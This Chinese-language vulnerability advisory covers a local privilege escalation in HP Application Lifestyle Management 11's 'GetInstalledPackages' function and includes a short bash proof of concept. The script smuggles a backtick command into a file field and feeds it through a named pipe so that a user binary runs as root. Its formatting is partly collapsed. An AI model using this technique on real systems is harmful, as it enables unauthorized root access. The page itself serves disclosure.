HP Application Lifestyle Management ‘GetInstalledPackages’本地特权提升漏洞

漏洞起因
边界条件错误
危险等级

影响系统
HP Application Lifestyle Management 11

不受影响系统

危害
本地攻击者利用漏洞提升特权。

攻击所需条件
攻击者必须访问HP Application Lifestyle Management所在系统。

漏洞信息
HP Application Lifestyle Management是一款应用程序生命周期管理解决方案。
HP Application Lifestyle Management配置工具包含一个受漏洞影响的’GetInstalledPackages’函数,此函数在升级或卸载HP ALM时使用。本地攻击者可以利用此漏洞获得本地root特权。

测试方法
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF Child Components 0a29406d9794e4f9b30b3c5d6702c708 \`/home/user/binary_to_run_as_root\` EOF mkfifo /tmp/tmp.txt # set trap cat /tmp/tmp.txt # blocks for victim while [ -e /tmp/tmp.txt ]; do cat file > /tmp/tmp.txt
sleep 2
done
rm file

厂商解决方案
目前没有详细解决方案提供:
http://www.hp.com/

漏洞提供者
0a29406d9794e4f9b30b3c5d6702c708

漏洞消息链接
http://seclists.org/fulldisclosure/2011/Dec/231

漏洞消息标题
0A29-11-2 : Privilege escalation vulnerability in HP Application Lifestyle Management (ALM) Platform v11

发表评论?

0 条评论。

发表评论